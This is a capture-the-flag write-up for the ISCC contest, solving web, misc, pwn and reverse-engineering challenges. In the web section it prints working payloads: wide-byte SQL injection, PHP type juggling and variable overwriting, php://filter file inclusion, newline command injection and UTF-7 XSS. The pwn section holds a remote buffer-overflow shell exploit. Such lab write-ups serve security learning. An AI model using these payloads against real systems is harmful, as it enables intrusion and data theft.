ISCC-writeup

web

A bigger number will do

Just change the length limit on the input field.
http://lab1.xseclab.com/base10_0b4e4866096913ac9c3a2272dde27215/index.php
[screenshot: web1]

Temptation of localhost

http://118.190.152.202:8013/
XFF: just right-click to view the page source and the flag is there.
[screenshot: web2]

web02

http://118.190.152.202:8004/
Modify the HTTP request header:

client-ip:127.0.0.1

[screenshot: web3]

Please give me username and password!

Following the hint, submit a GET request with username and password; this reveals an index.php.txt file with the following source:
http://118.190.152.202:8017/index.php.txt

<?php
error_reporting(0);
$flag = "***********";
if(isset($_GET['username'])){
    if (0 == strcasecmp($flag,$_GET['username'])){
        $a = fla;
        echo "very good!Username is right";
    }
    else{
        print 'Username is not right<!--index.php.txt-->';}
}else
    print 'Please give me username or password!';
if (isset($_GET['password'])){
    if (is_numeric($_GET['password'])){
        if (strlen($_GET['password']) < 4){
            if ($_GET['password'] > 999){
                $b = g;
                print '<p>very good!Password is right</p>';
            }else
                print '<p>Password too little</p>';
        }else
            print '<p>Password too long</p>';
    }else
        print '<p>Password is not numeric</p>';
}
if ($a.$b == "flag")
    print $flag;
?>

This abuses PHP's weak typing (passing username as an array), and scientific notation gets past the password length check.
Payload:

?username[]=12345&password=9e9

[screenshot: web4]

## The Art of SQL Injection
http://118.190.152.202:8015/index.php?id=1%df%27%23
The character encoding declared in the page source suggested a wide-byte injection; a quick test confirmed the injection point.
[screenshot: web5-1]

http://118.190.152.202:8015/index.php?id=1%df%27

Find the number of columns:

http://118.190.152.202:8015/index.php?id=1%df%27 order by 9--+

List the databases:

http://118.190.152.202:8015/index.php?id=-1%df%27 union select 1,group_concat(schema_name),3,4,5,6,7,8 from information_schema.schemata--+

[screenshot: web5-2]
List the table names:

http://118.190.152.202:8015/index.php?id=-1%df%27 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--+

[screenshot: web5-3]
List the columns:

http://118.190.152.202:8015/index.php?id=-1%df%27 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database()--+

[screenshot: web5-4]
Read the flag:

http://118.190.152.202:8015/index.php?id=-1%df%27 union select 1,group_concat(flag),3,4,5,6,7,8 from admins--+

[screenshot: web5-5]
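As an added example (not from the writeup), this shows why the `%df%27` trick works and what the fix looks like: a byte-oriented, addslashes-style escape inserts 0x5c before the quote, and GBK then reads 0xdf 0x5c as one two-byte character, leaving the quote live. Escaping after decoding with the real connection charset (or, better, using parameterized queries) has no such hole. The function names and the sample bytes are my own.

```python
def has_unescaped_quote(text: str) -> bool:
    """True if some single quote is not immediately preceded by a backslash."""
    return any(ch == "'" and (i == 0 or text[i - 1] != "\\")
               for i, ch in enumerate(text))

def escape_bytes_naive(raw: bytes) -> bytes:
    """addslashes-style escaping applied to raw bytes, blind to the connection charset."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)  # prepend a backslash byte
        out.append(b)
    return bytes(out)

def escape_charset_aware(raw: bytes, charset: str = "gbk") -> str:
    """Decode with the connection charset first, then escape characters.
    A lone lead byte such as 0xdf followed by 0x27 is not a valid GBK sequence,
    so it becomes U+FFFD instead of swallowing the backslash."""
    text = raw.decode(charset, errors="replace")
    return "".join("\\" + c if c in "'\"\\\x00" else c for c in text)

def quote_survives_escape(raw: bytes, charset: str = "gbk") -> bool:
    """Does the naive escape leave a live quote once the server decodes the bytes as charset?"""
    decoded = escape_bytes_naive(raw).decode(charset, errors="replace")
    return has_unescaped_quote(decoded)

# Constructed sample: the id parameter from the writeup, 1%df%27, as raw request bytes.
SAMPLE = b"1\xdf'"
```

With `SAMPLE`, the naive escape decodes under GBK to three characters with the quote intact, while the charset-aware version never yields an unescaped quote.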

Can you cross over?

http://118.190.152.202:8010/
[screenshot: web6]

http://www.test.com/NodeMore.jsp?id=672613&page=2&pageCounter=32&undefined&callback=%2b/v%2b%20%2bADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA%2bAC0-&_=1302746925413

Decode the UTF-7 encoding (I used the tool below) to get:
http://web2hack.org/xssee/

http://www.test.com/NodeMore.jsp?id=672613&page=2&pageCounter=32&undefined&callback=+/v+ <script>alert("key:/%nsfocusXSStest%/")</script>-&_=1302746925413

Submit the resulting key to get the flag.
[screenshot: web6-1]

It's all tricks

http://118.190.152.202:8009/index.php
The source is leaked at index.php.txt:

<?php

include "flag.php";

if ($_SERVER["REQUEST_METHOD"] != "POST")
    die("flag is here");

if (!isset($_POST["flag"]) )
    die($_403);

foreach ($_GET as $k => $v){
    $$k = $$v;
}

foreach ($_POST as $k => $v){
    $$k = $v;
}

if ( $_POST["flag"] !== $flag )
    die($_403);

echo "flag: ". $flag . "\n";
die($_200);

?>

This is PHP variable overwriting; I looked up the relevant background on Baidu.
Reference: http://www.freebuf.com/column/150731.html
Payload:

post: flag=笨死了笨死了
get: _200=flag

[screenshot: web7]

Can you bypass it?

http://118.190.152.202:8008/index.php?f=articles&id=1
The URL suggests a file inclusion; this follows a similar file-inclusion challenge from moctf.
Construct the payload:

http://118.190.152.202:8008/index.php?f=index.php

It returns error, so there must be a filter; we can use base64 encoding to get around it.
Payload:

http://118.190.152.202:8008/index.php?f=php://filter/read=convert.base64-encode/resource=index.php

Still error, so something else is being filtered; after some testing the final payload is:

http://118.190.152.202:8008/index.php?f=PHP://filter/read=convert.base64-encode/resource=index&id=1

The page echoes the file; base64-decoding it gives:

<?php
#ISCC{LFIOOOOOOOOOOOOOO}
if(isset($_GET['f'])){
    if(strpos($_GET['f'],"php") !== False){
        die("error...");
    }
    else{
        include($_GET['f'] . '.php');
    }
}
?>

Please ping my IP; can you reach it?

http://118.190.152.202:8018/
I have done similar challenges before: the ping command is used to run other commands. First list the directory; the listing comes back, so it works.
Payload:

http://118.190.152.202:8018/index.php?ip=127.0.0.1%0als

[screenshot: web8]

http://118.190.152.202:8018/index.php?ip=127.0.0.1%0acat flag.txt

[screenshot: web8-1]
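As an added example (not from the writeup), here is the ping form's `ip` parameter handled the way the vulnerable page evidently does it, next to a validated, argv-based version that no shell ever parses. The command prefix, the helper names and the sample input are my own assumptions.

```python
import ipaddress

def build_command_naive(ip: str) -> str:
    """The pattern the vulnerable page evidently uses: the parameter is pasted into a
    shell command string. A newline (%0a in the URL) ends the ping command, and the
    shell parses whatever follows as a second command."""
    return "ping -c 1 " + ip

def shell_commands(command: str) -> list:
    """Split a command string the way a POSIX shell separates commands on newlines."""
    return [line.strip() for line in command.split("\n") if line.strip()]

def validate_ip(ip: str) -> str:
    """Accept only a literal IPv4/IPv6 address; anything else raises ValueError."""
    ip = ip.strip()
    ipaddress.ip_address(ip)  # "127.0.0.1\nls", "127.0.0.1;ls", "example.com" all fail
    return ip

def is_accepted(ip: str) -> bool:
    try:
        validate_ip(ip)
        return True
    except ValueError:
        return False

def build_argv_safe(ip: str) -> list:
    """Argument vector for subprocess.run(argv, shell=False): the validated address is a
    single argv element, so shell separators such as newline carry no meaning."""
    return ["ping", "-c", "1", validate_ip(ip)]
```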

Try it (half-understood)

http://118.190.152.202:8006/
Looking at the source reveals:

<img src="show.php?img=1.jpg">

Use a PHP stream wrapper (php://filter).
Payload:

view-source:http://118.190.152.202:8006/show.php?img=php://filter/resource=1.jpgresource=../flag.php

flag:

<!-- flag{1ntere5ting_PHP_Regu1ar_express1onssssss} -->

misc

What is that?

PNG pixel steganography: adjust the image height to reveal the flag.
[screenshot: misc1]

Secret telegram

At a glance this looks like a Bacon cipher:

ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA

Decoding by hand:

ABAAA  I
ABABB  L
ABAAA  I
ABABA  K
AABAA  E
ABAAA  I
BAABA  S
AAABA  C
AAABA  C

flag: ILIKEISCC
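The hand decoding above uses the 26-letter Baconian table (each five-letter group is a binary index into A..Z). As an added example, not from the writeup, the decoder below handles both that table and the classic 24-letter one (I/J and U/V share a code), which diverge from the ninth letter onward; the helper names are my own.

```python
def _code(i: int) -> str:
    """Five-bit index written with A for 0 and B for 1, e.g. 8 -> 'ABAAA'."""
    return format(i, "05b").replace("0", "A").replace("1", "B")

# 26-letter variant: index i maps straight to chr(65 + i).
BACON_26 = {_code(i): chr(65 + i) for i in range(26)}

# Classic 24-letter variant: J folds into I and V folds into U.
BACON_24 = {_code(i): ch for i, ch in enumerate("ABCDEFGHIKLMNOPQRSTUWXYZ")}

def decode_bacon(cipher: str, variant: int = 26) -> str:
    """Decode an A/B string in five-letter groups; raises ValueError on bad input."""
    table = {26: BACON_26, 24: BACON_24}[variant]
    cipher = "".join(cipher.split()).upper()
    if len(cipher) % 5 or set(cipher) - {"A", "B"}:
        raise ValueError("Bacon text must be A/B only, in groups of five")
    return "".join(table[cipher[i:i + 5]] for i in range(0, len(cipher), 5))

def encode_bacon(plain: str) -> str:
    """Encode uppercase letters with the 26-letter table."""
    inverse = {v: k for k, v in BACON_26.items()}
    return "".join(inverse[ch] for ch in plain.upper() if ch.isalpha())

# The telegram from the challenge.
TELEGRAM = "ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA"
```

Running it on `TELEGRAM` under the 24-letter table yields a different string, which is the usual tell for which variant a puzzle author used.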

Layers of espionage (yingingying)

First decode base64 repeatedly, replacing %3D with = along the way; when it no longer decodes, inspect the string, strip the URL encoding, then AES-decrypt, and finally decode with 与佛论禅 (the "Buddha says" cipher) to get the flag:
AES decryption tool (link)
flag:把我复制走

Where is the FLAG?

Opening it in WinHex shows the following:
[screenshot: ISCC]
Download the matching software and open the attachment; the layers form a QR code split into 8 pieces. Reassemble them to get the flag.
[screenshot: IQR]

Caesar XIII

Caesar XIII, having learned to use a keyboard, throws a string at you: "ebdgc697g95w3". Guess it.

rot13 (Caesar XIII) -> roqtp697t95j3
The hint also mentions a keyboard cipher: shift each key down one row on the keyboard to get the flag.

roqtp697t95j3
flag: yougotme

A cat's mind

Extract a block of text from the image (a DOC file header was found), then go through a series of base and string conversions.

如是我闻:名西三陵帝焰数诵诸山众參哈瑟倒陰捨劫奉惜逝定雙月奉倒放足即闍重号貧老诵夷經友利普过孕北至花令藐灯害蒙能羅福羅夢开雙禮琉德护慈積寫阿璃度戏便通故西故敬于瑟行雙知宇信在礙哈数及息闍殺陵游盧槃药諦慈灯究幽灯豆急彌貧豆親诵梭量树琉敬精者楞来西陰根五消夢众羅持造彌六师彌怖精僧璃夫薩竟祖方夢訶橋經文路困如牟憐急尼念忧戏輸教乾楞能敬告树来楞殊倒哈在紛除亿茶涅根輸持麼阿空瑟稳住濟号他方牟月息盡即来通貧竟怖如槃精老盡恤及游薩戏师毒兄宝下行普鄉释下告劫惜进施盡豆告心蒙紛信胜东蒙求帝金量礙故弟帝普劫夜利除積众老陀告沙師尊尼捨惜三依老蒙守精于排族祖在师利寫首念凉梭妙經栗穆愛憐孝粟尊醯造解住時刚槃宗解牟息在量下恐教众智焰便醯除寂想虚中顛老弥诸持山諦月真羅陵普槃下遠涅能开息灯和楞族根羅宝戒药印困求及想月涅能进至贤金難殊毘瑟六毘捨薩槃族施帝遠念众胜夜夢各万息尊薩山哈多皂诵盡药北及雙栗师幽持牟尼隸姪遠住孕寂以舍精花羅界去住勒排困多閦呼皂難于焰以栗婦愛闍多安逝告槃藐矜竟孕彌弟多者精师寡寫故璃舍各亦方特路茶豆積梭求号栗怖夷凉在顛豆胜住虚解鄉姪利琉三槃以舍劫鄉陀室普焰于鄉依朋故能劫通

After 与佛论禅 decryption:


After hex to string:


After base64 decoding:

GUZDGMJUGU3UCNJSGQ2TMNBUIU2TGNSDGY2DIOBVGI2TMNZQGU2TKNJTGAZTKNCDGUZDGMBWGQ2UCNCFGQ3DKMRVGA2TINJWG4YDKNZVGM2TMNSCG44TKMRUGY2EKNCFGU3TMQZVIE2DQNJXGU3DOMBVGU2TINJVGMYTMMJVGY3EENSDGVATIRBWIM2TMNBUGU2DMQRUIU2DQNJSGMYTOMBUGM2TMNBVGY2DKMBVGE3EGNKBGRATKNZVGQ2ECNBVGU2DGMBTGE3DCNJWGQ2TMNBVGY2EINSCGUZDIQZVGQ2TKNCBGU2TKMRTGA2DMNRRGU3DINJUIU2EMNJRGMYDKQJUHA2TMNJUGRATIMRVGA2TIMZQGM4TKMBVGEZUIM2E

After base32 decoding:

5231457A5245644E536C6448525670555530354C5230645A4E4652505456705753566B7952464E4E576C5A485756705554553161566B6C5A4D6C5644546B4E485231704356456450516C5A4A57544A4554303161564564564D6B524C54554A555230466156454E4F51305A4856544A425054303950513D3D

After hex to ASCII:

R1EzREdNSldHRVpUU05LR0dZNFRPTVpWSVkyRFNNWlZHWVpUTU1aVklZMlVDTkNHR1pCVEdPQlZJWTJET01aVEdVMkRLTUJUR0FaVENOQ0ZHVTJBPT09PQ==

After base64 decoding:

GQ3DGMJWGEZTSNKGGY4TOMZVIY2DSMZVGYZTMMZVIY2UCNCGGZBTGOBVIY2DOMZTGU2DKMBTGAZTCNCFGU2A====

After base32 decoding:

463161395F69735F493563635F5A4F6C385F4733545030314E54

After hex to ASCII:

F1a9_is_I5cc_ZOl8_G3TP01NT

Brute force is not the way

We get the ciphertext:

vfppjrnerpbzvat

A Caesar shift gives the flag:

isccwearecoming

pwn

python:

from pwn import *
#p = process('./pwn50')
p = remote('47.104.16.75',9000)

log.info(p.recvuntil(":"))
p.sendline("admin")

log.info(p.recvuntil(":"))
p.sendline("T6OBSh2i")

log.info(p.recvuntil(": "))
p.sendline("1")

log.info(p.recvuntil(": "))
p.sendline("/bin/sh")

log.info(p.recvuntil(": "))
payload = "\x00"*0x58 + p64(0x40084A) #mov edi,0x61100
p.sendline(payload)
log.info(p.recvuntil(": "))
p.sendline("3")

p.interactive()

flag{welcome_to_iscc}

re

RSA

1. Use openssl to parse public.key and obtain the RSA n and e:

root@kali:~/Desktop# openssl rsa -in public.key -pubin -noout -text -modulus
Public-Key: (256 bit)
Modulus:
00:d9:9e:95:22:96:a6:d9:60:df:c2:50:4a:ba:54:
5b:94:42:d6:0a:7b:9e:93:0a:ff:45:1c:78:ec:55:
d5:55:eb
Exponent: 65537 (0x10001)
Modulus=D99E952296A6D960DFC2504ABA545B9442D60A7B9E930AFF451C78EC55D555EB

Factor n to get p and q:

n=98432079271513130981267919056149161631892822707167177858831841699521774310891
p=302825536744096741518546212761194311477
q=325045504186436346209877301320131277983

The Python script:

#!/usr/bin/env python2
# -*- coding:utf8 -*-

import gmpy
import rsa

def foo():
    p=302825536744096741518546212761194311477
    q=325045504186436346209877301320131277983
    n=98432079271513130981267919056149161631892822707167177858831841699521774310891
    e=65537
    # private exponent: d = e^-1 mod (p-1)(q-1)
    d=int(gmpy.invert(e,(p-1)*(q-1)))
    private_key=rsa.PrivateKey(n,e,d,p,q)
    with open('fujian/encrypted.message1','rb') as f:
        print rsa.decrypt(f.read(),private_key).decode()
    with open('fujian/encrypted.message2','rb') as f:
        print rsa.decrypt(f.read(),private_key).decode()
    with open('fujian/encrypted.message3','rb') as f:
        print rsa.decrypt(f.read(),private_key).decode()
    pass

if __name__ == '__main__':
    foo()
    print 'ok'
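The whole challenge hinges on the modulus being only 256 bits, which is why it factored at all. As an added example (not from the writeup), the pure-Python 3.8+ code below recovers d from the page's p and q without gmpy or the rsa package, verifies the key arithmetic with a round trip, and runs the key-size check a reviewer would apply to any public key. The 2048-bit threshold and helper names are my own assumptions.

```python
# Values from the writeup.
N = 98432079271513130981267919056149161631892822707167177858831841699521774310891
P = 302825536744096741518546212761194311477
Q = 325045504186436346209877301320131277983
E = 65537

MIN_SAFE_BITS = 2048  # assumed policy threshold for RSA modulus size

def private_exponent(p: int, q: int, e: int) -> int:
    """d = e^-1 mod phi(n), using Python's built-in modular inverse (3.8+)."""
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)

def rsa_roundtrip(m: int, n: int, e: int, d: int) -> bool:
    """Textbook RSA sanity check: decrypt(encrypt(m)) == m for 0 <= m < n."""
    return pow(pow(m, e, n), d, n) == m

def audit_public_key(n: int, e: int) -> list:
    """Findings a reviewer would raise on (n, e); an empty list means nothing obvious."""
    findings = []
    bits = n.bit_length()
    if bits < MIN_SAFE_BITS:
        findings.append(f"modulus is only {bits} bits; far below {MIN_SAFE_BITS}")
    if n % 2 == 0:
        findings.append("modulus is even, so 2 is a factor")
    if e < 3 or e % 2 == 0:
        findings.append("public exponent must be an odd integer >= 3")
    return findings
```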

flag{3b6d3806-4b2b-11e7-95a0-000c29d7e93d}

My math is bad

flag{th3_Line@r_4lgebra_1s_d1fficult!}
